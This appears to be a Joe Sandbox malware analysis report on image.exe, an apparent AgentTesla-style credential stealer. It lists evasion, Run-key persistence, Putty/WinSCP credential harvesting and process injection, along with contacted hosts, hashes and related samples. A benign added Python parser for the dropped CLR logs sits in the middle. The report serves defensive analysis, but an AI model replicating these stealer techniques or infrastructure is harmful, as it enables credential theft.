Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Timestomp [1]; DLL Side-Loading [1]; Masquerading [1]; Valid Accounts [1]; Modify Registry [1]; Access Token Manipulation [1]; Virtualization/Sandbox Evasion [361]; Process Injection [211]; Hidden Files and Directories [1]
Credential Access: OS Credential Dumping [2]; Input Capture [1]; Credentials in Registry [1]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
Discovery: File and Directory Discovery [1]; System Information Discovery [34]; Security Software Discovery [631]; Process Discovery [1]; Virtualization/Sandbox Evasion [361]; Application Window Discovery [1]; Remote System Discovery [1]; System Network Configuration Discovery [11]; Network Sniffing; Network Service Discovery; System Network Connections Discovery; Process Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Input Capture [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [23]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking
                    Behavior Graph (ID: 1492221, sample: image.exe, start date: 13/08/2024, architecture: WINDOWS, score: 100)

                    Contacted hosts: ip-api.com, evdanco.ru, api.ipify.org
                    Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 11 other signatures

                    Process tree:
                    • image.exe
                      Dropped: C:\Users\user\AppData\Local\...\image.exe.log (ASCII)
                      Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Hides that the sample has been downloaded from the Internet (zone.identifier); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      • cmd.exe
                        Dropped: C:\Users\user\AppData\Roaming\ACID.exe (PE32); C:\Users\user\...\ACID.exe:Zone.Identifier (ASCII)
                        Signatures: Uses ping.exe to sleep
                        • ACID.exe
                          Dropped: C:\Users\user\AppData\Local\...\watchdog.exe (PE32)
                          Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 3 other signatures
                          • InstallUtil.exe
                            Network: ip-api.com 208.95.112.1 (local port 49728, remote port 80, TUT-ASUS, United States); evdanco.ru 80.96.42.133 (local port 49729, remote port 587, RCS-RDS73-75DrStaicoviciRO, Romania); api.ipify.org 104.26.13.205 (local port 49727, remote port 443, CLOUDFLARENETUS, United States)
                            Dropped: C:\Users\user\AppData\Roaming\...\VsUPptm.exe (PE32)
                            Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); 5 other signatures
                          • watchdog.exe
                            Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
                            • watchdog.exe
                        • conhost.exe
                        • PING.EXE
                        • PING.EXE
                      • cmd.exe
                        Signatures: Uses ping.exe to check the status of other devices and networks
                        • reg.exe
                          Signatures: Creates multiple autostart registry keys
                        • PING.EXE
                          Network: 127.0.0.1
                        • conhost.exe

                    Antivirus detection (submitted file)
                    Source | Detection | Scanner | Label
                    image.exe | 34% | ReversingLabs | Win32.Trojan.Generic
                    image.exe | 100% | Joe Sandbox ML |

                    Antivirus detection (dropped files)
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Temp\watchdog.exe | 100% | Avira | TR/Agent.able
                    C:\Users\user\AppData\Roaming\ACID.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Local\Temp\watchdog.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.CrypterX
                    C:\Users\user\AppData\Roaming\ACID.exe | 34% | ReversingLabs | Win32.Trojan.Generic
                    C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exe | 0% | ReversingLabs |
                    No Antivirus matches
                    No Antivirus matches
                    Antivirus detection (URLs)
                    Source | Detection | Scanner | Label
                    https://api.ipify.org/ | 0% | URL Reputation | safe
                    https://api.ipify.org | 0% | URL Reputation | safe
                    https://account.dyn.com/ | 0% | URL Reputation | safe
                    https://api.ipify.org/t | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                    http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
                    http://ip-api.com | 0% | URL Reputation | safe
                    http://evdanco.ru | 100% | Avira URL Cloud | malware
                    http://purl.oen | 0% | Avira URL Cloud | safe
                    Contacted domains
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    evdanco.ru | 80.96.42.133 | true | true | | unknown
                    api.ipify.org | 104.26.13.205 | true | false | | unknown
                    ip-api.com | 208.95.112.1 | true | true | | unknown
                    Contacted URLs
                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.ipify.org/ | false | URL Reputation: safe | unknown
                    http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
                    URLs found in memory or binary data
                    Name | Source (process memory dumps) | Malicious | Antivirus Detection | Reputation
                    https://api.ipify.org | image.exe, ACID.exe, InstallUtil.exe | false | URL Reputation: safe | unknown
                    https://account.dyn.com/ | image.exe, ACID.exe, InstallUtil.exe | false | URL Reputation: safe | unknown
                    https://api.ipify.org/t | InstallUtil.exe | false | URL Reputation: safe | unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | InstallUtil.exe | false | URL Reputation: safe | unknown
                    http://evdanco.ru | InstallUtil.exe | false | Avira URL Cloud: malware | unknown
                    http://ip-api.com | InstallUtil.exe | false | URL Reputation: safe | unknown
                    http://purl.oen | ACID.exe | false | Avira URL Cloud: safe | unknown
                    Contacted public IPs
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
                    80.96.42.133 | evdanco.ru | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | true
                    104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false

                    Private IPs
                    127.0.0.1
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1492221
                          Start date and time:2024-08-13 16:28:38 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 58s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:20
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:image.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@23/10@3/4
                          EGA Information:
                          • Successful, ratio: 60%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 156
                          • Number of non-executed functions: 11
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target watchdog.exe, PID 1832 because it is empty
                          • Execution Graph export aborted for target watchdog.exe, PID 4048 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: image.exe
                    Time | Type | Description
                    10:29:41 | API Interceptor | 42x Sleep call for process: image.exe modified
                    10:30:53 | API Interceptor | 123x Sleep call for process: ACID.exe modified
                    10:31:37 | API Interceptor | 22x Sleep call for process: InstallUtil.exe modified
                    16:29:59 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ACID C:\Users\user\AppData\Roaming\ACID.exe
                    16:30:07 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ACID C:\Users\user\AppData\Roaming\ACID.exe
                    16:31:41 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VsUPptm C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exe
                    Context: IPs seen in other analyses
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context

                    208.95.112.1
                    • SHIPMENT-DETAILS_pdf.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    • SWIFT_SO-P1010922.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    • informe - 2024-08-09T174159.596.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    • Loader.exe | malicious | ZTrat | ip-api.com/xml/?fields=countryCode,query
                    • solicitud de cotizacion0089087785.xlam.xlsx | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    • TMP-070-202409082567.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    • RobloxCodeBruter.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
                    • setup.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
                    • Server.exe | malicious | AsyncRAT, XWorm, Xmrig | ip-api.com/line/?fields=hosting
                    • setup.exe | malicious | XWorm | ip-api.com/line/?fields=hosting

                    80.96.42.133
                    • devil.vbe | malicious | AgentTesla
                    • ZUpK81URgS.exe | malicious | AgentTesla
                    • wxNW7IVzIp.exe | malicious | AgentTesla
                    • QUOTATION.exe | malicious | AgentTesla, PureLog Stealer

                    104.26.13.205
                    • SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe | malicious | Unknown | api.ipify.org/
                    • vstdlib_s64.dll.dll | malicious | Quasar | api.ipify.org/
                    • golang-modules.exe | malicious | Unknown | api.ipify.org/
                    • SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exe | malicious | Unknown | api.ipify.org/
                    • 242764.exe | malicious | Ficker Stealer, Rusty Stealer | api.ipify.org/?format=wef
                    • Ransom.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/
                    • ld.exe | malicious | Targeted Ransomware, TrojanRansom | api.ipify.org/
                    • ReturnLegend.exe | malicious | Stealit | api.ipify.org/?format=json
                    • SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exe | malicious | PureLog Stealer, Targeted Ransomware | api.ipify.org/
                    • Sky-Beta-Setup.exe | malicious | Stealit | api.ipify.org/?format=json
                    Context: domains seen in other analyses
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context

                    ip-api.com
                    • SHIPMENT-DETAILS_pdf.exe | malicious | AgentTesla | 208.95.112.1
                    • https://www.hitpaw.net/sem/hitpaw-video-enhancer.html?gad_source=1&gclid=Cj0KCQjw5ea1BhC6ARIsAEOG5pz1R08RbPMAuwS5INSCuFi4ByNPHfKUrpl73-bCLl2w94oo0g81yCgaAsDrEALw_wcB | malicious | Unknown | 51.77.64.70
                    • SWIFT_SO-P1010922.exe | malicious | AgentTesla | 208.95.112.1
                    • informe - 2024-08-09T174159.596.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
                    • Loader.exe | malicious | ZTrat | 208.95.112.1
                    • solicitud de cotizacion0089087785.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
                    • TMP-070-202409082567.exe | malicious | AgentTesla | 208.95.112.1
                    • RobloxCodeBruter.exe | malicious | XWorm | 208.95.112.1
                    • setup.exe | malicious | XWorm | 208.95.112.1
                    • Server.exe | malicious | AsyncRAT, XWorm, Xmrig | 208.95.112.1

                    evdanco.ru
                    • devil.vbe | malicious | AgentTesla | 80.96.42.133
                    • ZUpK81URgS.exe | malicious | AgentTesla | 80.96.42.133
                    • wxNW7IVzIp.exe | malicious | AgentTesla | 80.96.42.133
                    • QUOTATION.exe | malicious | AgentTesla, PureLog Stealer | 80.96.42.133

                    api.ipify.org
                    • ordine di acquisto ON15570.exe | malicious | AgentTesla | 104.26.13.205
                    • ordine di acquisto ON15570.exe | malicious | AgentTesla | 172.67.74.152
                    • pago.exe | malicious | AgentTesla | 172.67.74.152
                    • invoice.exe | malicious | AgentTesla | 104.26.13.205
                    • Shipping docs.exe | malicious | AgentTesla | 104.26.13.205
                    • MV TBN - VESSEL_details.doc.exe | malicious | AgentTesla, PureLog Stealer | 104.26.12.205
                    • MV FIONA - VESSEL'S PARTICULARS (0)(1).pdf.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
                    • https://t1.a.editions-legislatives.fr/r/?id=hfe20c57e,3602a3f1,7f94ba88&p1=papsolutionsptyltd.sharefile.com/public/share/web-scf26ff3a4b6d4c1db1815de3794eb6be | malicious | HTMLPhisher | 104.26.12.205
                    • ARRIVAL NOTICE.exe | malicious | AgentTesla, PureLog Stealer | 104.26.13.205
                    • NINGBO-Invoices-Past Due.exe | malicious | AgentTesla, DarkTortilla | 172.67.74.152
                    Context: ASNs seen in other analyses
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context

                    CLOUDFLARENETUS
                    • https://t.co/HabMZWSJ3f | malicious | HTMLPhisher | 172.67.206.153
                    • OMSG2024080890D-KHOJALY-LANSHAN.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
                    • ORDER 0475.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
                    • ordine di acquisto ON15570.exe | malicious | AgentTesla | 104.26.13.205
                    • ordine di acquisto ON15570.exe | malicious | AgentTesla | 172.67.74.152
                    • pago.exe | malicious | AgentTesla | 172.67.74.152
                    • invoice.exe | malicious | AgentTesla | 104.26.13.205
                    • RFQ 24737852.exe | malicious | Unknown | 188.114.96.3

                    RCS-RDS73-75DrStaicoviciRO
                    • devil.vbe | malicious | AgentTesla | 80.96.42.133
                    • mips.elf | malicious | Mirai | 5.12.39.92
                    • botx.arm.elf | malicious | Mirai | 86.122.224.63
                    • sora.mpsl.elf | malicious | Mirai | 79.116.181.228
                    • sora.mips.elf | malicious | Mirai | 86.120.18.245
                    • ZUpK81URgS.exe | malicious | AgentTesla | 80.96.42.133
                    • 77.90.35.9-skid.arm5-2024-07-30T07_10_52.elf | malicious | Mirai, Moobot | 5.12.90.101
                    • wxNW7IVzIp.exe | malicious | AgentTesla | 80.96.42.133
                    • x86_64.elf | malicious | Mirai | 86.120.245.139
                    • QUOTATION.exe | malicious | AgentTesla, PureLog Stealer | 80.96.42.133

                    TUT-ASUS
                    • SHIPMENT-DETAILS_pdf.exe | malicious | AgentTesla | 208.95.112.1
                    • SWIFT_SO-P1010922.exe | malicious | AgentTesla | 208.95.112.1
                    • informe - 2024-08-09T174159.596.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
                    • Loader.exe | malicious | ZTrat | 208.95.112.1
                    • solicitud de cotizacion0089087785.xlam.xlsx | malicious | AgentTesla | 208.95.112.1
                    • TMP-070-202409082567.exe | malicious | AgentTesla | 208.95.112.1
                    • RobloxCodeBruter.exe | malicious | XWorm | 208.95.112.1
                    • setup.exe | malicious | XWorm | 208.95.112.1
                    • Server.exe | malicious | AsyncRAT, XWorm, Xmrig | 208.95.112.1
                    • setup.exe | malicious | XWorm | 208.95.112.1
                    Context: JA3 fingerprints seen in other analyses
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context

                    3b5074b1b5d032e5620f69f9f700ff0e
                    • OMSG2024080890D-KHOJALY-LANSHAN.exe | malicious | Snake Keylogger, VIP Keylogger | 104.26.13.205
                    • ORDER 0475.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.26.13.205
                    • ordine di acquisto ON15570.exe | malicious | AgentTesla | 104.26.13.205
                    • ordine di acquisto ON15570.exe | malicious | AgentTesla | 104.26.13.205
                    • education.html | malicious | Unknown | 104.26.13.205
                    • pago.exe | malicious | AgentTesla | 104.26.13.205
                    • invoice.exe | malicious | AgentTesla | 104.26.13.205
                    • Product Requirement Specification.scr.exe | malicious | Unknown | 104.26.13.205
                    • PO SSCJ-2406002.exe | malicious | Snake Keylogger, VIP Keylogger | 104.26.13.205
                    • Shipping docs.exe | malicious | AgentTesla | 104.26.13.205
                    Context: dropped files seen in other analyses
                    Match | Associated Sample Name / URL | Detection | Threat Name

                    C:\Users\user\AppData\Local\Temp\watchdog.exe
                    • file.exe | malicious | DarkTortilla, FormBook
                    • Approved_Invoice_0000384834.exe | malicious | DarkTortilla, RedLine, XWorm, zgRAT
                    • po-544-8370.exe | malicious | DarkTortilla, RedLine, XWorm, zgRAT
                    • Approved PO.exe | malicious | DarkTortilla, RedLine, XWorm
                    • SO-0093848222.exe | malicious | DarkTortilla, RedLine, XWorm
                    • LLC_KHIMAKTIV_SOFT_Po_Official_2023.exe | malicious | DarkTortilla, RedLine, XWorm
                    • SO-x-008387489.exe | malicious | DarkTortilla, RedLine, XWorm
                    • IB7QP60Fdx.exe | malicious | AveMaria, DarkTortilla, UACMe
                    • Quote_for_order.exe | malicious | AveMaria, DarkTortilla, UACMe
                    • PO_No.254990-81723.exe | malicious | AveMaria, DarkTortilla, UACMe
                                                      Process:C:\Users\user\Desktop\image.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLU84qpE4KlKDE4KhKiKhIE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4j:Mgv2HKlYHKh3oIHKx1qHitHo6hAHKzea
                                                      MD5:FB53815DEEC334028DBDE4E3660E26D0
                                                      SHA1:7F491359EC244406DFC8AA39FC9B727D677E4FDF
                                                      SHA-256:C3EC8D6C079B1940D82374A85E9DC41ED9FF683ADA338F89E375AA7AC777749D
                                                      SHA-512:5CC466901D7911BE1E1731162CC01C371444AAFA9A504F1F22516F60C888048EB78B5C5A12215EE2B127BD67A19677E370686465E85E08BC14015F8FAB049E49
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                      Process:C:\Users\user\AppData\Local\Temp\watchdog.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1362
                                                      Entropy (8bit):5.342650164635672
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhuE4UofoJE4r4CeylEE4aP6AE4KIRQ84j:MxHKlYHKh3ouHgJHreylEHMHKoQvj
                                                      MD5:D82ED94A6CE58CB457D58446EB9CFEB0
                                                      SHA1:67CDFD6F1503AEB97A7315B68CA9A7369CBA1710
                                                      SHA-256:04E9DBED386B13AB2E42E6CBA204EF2C17B3BF44DBC30BDF673A79F4FB98166A
                                                      SHA-512:3079B8B8131DC9BF8272FEC475A9A5C685E0DA9CDD881801DD0570EB51C8827541DFF1959BB6B7A7C27A40257AC316D3BF815BEC2690AEA0407E019CAE37D3BE
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\
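The two text files above, one written by image.exe and one by watchdog.exe, have the row layout of the CLR usage logs the .NET runtime keeps for NGEN: two header rows tagged 1, then one row per assembly, tagged 2 when only the display name is recorded and 3 when the native image path is recorded as well (the report does not show the file path, so that identification is mine, not the report's). The parser below is an added example, not code from the report or the sample. Its input is transcribed from the previews above with each ".." restored to CR LF; the first log keeps the preview's truncated last row so the parser has to cope with it, and the second is an excerpt of the watchdog.exe preview (header rows plus its WPF rows). `gui_stack` is a helper of mine that reads the UI framework off the assembly list, which is the visible difference between the two processes.

```python
import csv
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input, transcribed from the report's preview of the file dropped
# by image.exe: each ".." in the preview is a CR LF pair, and the preview (and
# therefore the last row here) is cut off at the report's preview length.
IMAGE_EXE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\920e3d1d70447c3c10e69e6df0766568\\System.ni.dll",0\r\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\8b2c1203fd20aea8260bfbc518004720\\System.Core.ni.dll",0\r\n'
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0\r\n'
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a'  # truncated in the preview
)

# Constructed excerpt of the file dropped by watchdog.exe: the header rows and
# the WPF rows from its preview (its System/System.Core rows are omitted here).
WATCHDOG_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\WindowsBase\\4d760e3e4675c4a4c66b64205fb0d001\\WindowsBase.ni.dll",0\r\n'
    '3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PresentationCore\\17470ef0c7a174f38bdcadacc3e310ad\\PresentationCore.ni.dll",0\r\n'
)

# .NET assembly display name: "Name, Version=..., Culture=..., PublicKeyToken=..."
DISPLAY_NAME = re.compile(
    r'^(?P<name>[^,]+), Version=(?P<version>[^,]+), Culture=[^,]+, PublicKeyToken=(?P<pkt>[0-9a-f]+)$'
)


@dataclass
class AssemblyRef:
    name: str
    version: str
    public_key_token: str
    native_image: Optional[str]  # set for type-3 rows, which name an NGEN image


def parse_usage_log(text: str) -> List[AssemblyRef]:
    """Return the assemblies recorded in a CLR usage-log style file.

    Type-1 rows are the fusion/WinRT header; type-2 rows name an assembly;
    type-3 rows name an assembly plus its native image path. A row with an
    odd number of quotes is a truncated trailing row and is skipped rather
    than parsed into garbage fields.
    """
    refs: List[AssemblyRef] = []
    for line in text.split('\r\n'):
        if not line or line.count('"') % 2:
            continue
        row = next(csv.reader([line]))  # csv handles the quoted, comma-bearing display name
        kind = row[0]
        if kind not in ('2', '3'):
            continue
        m = DISPLAY_NAME.match(row[1])
        if m is None:
            continue
        refs.append(AssemblyRef(m['name'], m['version'], m['pkt'],
                                row[2] if kind == '3' else None))
    return refs


def gui_stack(refs: List[AssemblyRef]) -> str:
    """Infer the UI framework from the loaded assemblies (WPF vs WinForms)."""
    names = {r.name for r in refs}
    if names & {'PresentationFramework', 'PresentationCore', 'WindowsBase'}:
        return 'WPF'
    if 'System.Windows.Forms' in names:
        return 'WinForms'
    return 'none'


if __name__ == '__main__':
    for label, log in (('image.exe', IMAGE_EXE_LOG), ('watchdog.exe', WATCHDOG_LOG)):
        refs = parse_usage_log(log)
        print(label, gui_stack(refs))
        for r in refs:
            print('  ', r.name, r.version, r.native_image or '(no native image)')
```

Run as a script it lists image.exe as a WinForms process that also pulled in Microsoft.VisualBasic, and watchdog.exe as a WPF process; the truncated System.Xml row of the first log is dropped instead of being mis-split on its embedded commas.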
                                                      Process:C:\Users\user\AppData\Roaming\ACID.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:modified
                                                      Size (bytes):78336
                                                      Entropy (8bit):4.369296705546591
                                                      Encrypted:false
                                                      SSDEEP:768:jlU4+MS3Fu0thSOV4GM0SuHk9Oh/1TRIWUk7NlfaNV9KQLxXXSv:l6o03IGMLuHk+Ck5lfaNP7xSv
                                                      MD5:0E362E7005823D0BEC3719B902ED6D62
                                                      SHA1:590D860B909804349E0CDC2F1662B37BD62F7463
                                                      SHA-256:2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                                                      SHA-512:518991B68496B3F8545E418CF9B345E0791E09CC20D177B8AA47E0ABA447AA55383C64F5BDACA39F2B061A5D08C16F2AD484AF8A9F238CA23AB081618FBA3AD3
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: Approved_Invoice_0000384834.exe, Detection: malicious
• Filename: po-544-8370.exe, Detection: malicious
• Filename: Approved PO.exe, Detection: malicious
• Filename: SO-0093848222.exe, Detection: malicious
• Filename: LLC_KHIMAKTIV_SOFT_Po_Official_2023.exe, Detection: malicious
• Filename: SO-x-008387489.exe, Detection: malicious
• Filename: IB7QP60Fdx.exe, Detection: malicious
• Filename: Quote_for_order.exe, Detection: malicious
• Filename: PO_No.254990-81723.exe, Detection: malicious
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y ................P..&...........D... ........@.. ....................................`..................................D..W....`..............................hD............................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................D......H.......l....%......)....................................................0..6.......(8...t....&.(8...t....&......(8...t...................8;....8%.....(8...t....&.(8...t............:.....(8...t....:.....(8...t....:....(8...t....................................\:@....(8...t....&.)...&8.....(8...t....&(8...t....&.....:.......8x........:L...88....(8...t....&(8...t....&(8...t....&(8...t.....................:....8!.....(8...t....&......(8...t....&.....(8...t....:8.....(8...t....&.
                                                      Process:C:\Users\user\AppData\Roaming\ACID.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):56
                                                      Entropy (8bit):4.662016252639432
                                                      Encrypted:false
                                                      SSDEEP:3:ACgNN+EaKC5Yk9E9v:AVN7aZ5YYAv
                                                      MD5:8F7D92D744BB2B5D48C24AEFD74A47EC
                                                      SHA1:087CAF6B9AC7C4DE85B9CE4E1ABDFDE6607204B6
